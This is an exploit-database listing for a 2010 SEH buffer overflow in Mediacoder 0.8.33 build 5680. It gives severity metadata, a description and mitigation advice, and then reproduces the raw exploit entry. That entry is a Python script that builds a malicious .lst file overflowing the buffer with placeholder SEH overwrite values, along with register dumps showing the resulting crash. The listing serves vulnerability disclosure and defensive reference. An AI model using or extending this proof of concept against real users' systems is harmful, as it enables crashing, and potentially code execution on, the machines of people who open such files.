header-logo
Suggest Exploit
vendor:
Mediacoder
by:
Hadji Samir
9,3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Mediacoder
Affected Version From: 0.8.33 build 5680
Affected Version To: 0.8.33 build 5680
Patch Exists: YES
Related CWE: N/A
CPE: a:mediacoder:mediacoder:0.8.33.5680
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2010

Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.lst)

A buffer overflow vulnerability exists in Mediacoder 0.8.33 build 5680 when a specially crafted .lst file is opened. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. The vulnerability is due to the application not properly validating the length of user-supplied data before copying it to a fixed-length buffer. An attacker can exploit this vulnerability by enticing a user to open a specially crafted .lst file.

Mitigation:

Upgrade to the latest version of Mediacoder 0.8.33 build 5680 or later.
Source

Exploit-DB raw data:

# Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.lst)
# Date: 11/29/2010
# Author: Hadji Samir s-dz@hotmail.fr
# Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe
# Version: 0.8.33 build 5680

#    EAX 0012E788
#    ECX 43434343
#    EDX 00000000
#    EBX 43434343
#    ESP 0012E724
#    EBP 0012E774
#    ESI 0012E788
#    EDI 00000000

#!/usr/bin/python

buffer = ("http://" + "A" * 845)
nseh = ("B" * 4)
seh  = ("C" * 4)
junk = ("D" * 60)

f= open("exploit.lst",'w')
f.write(buffer + nseh + seh + junk)
f.close()

Navigation

Suggest Exploit

Services By CQR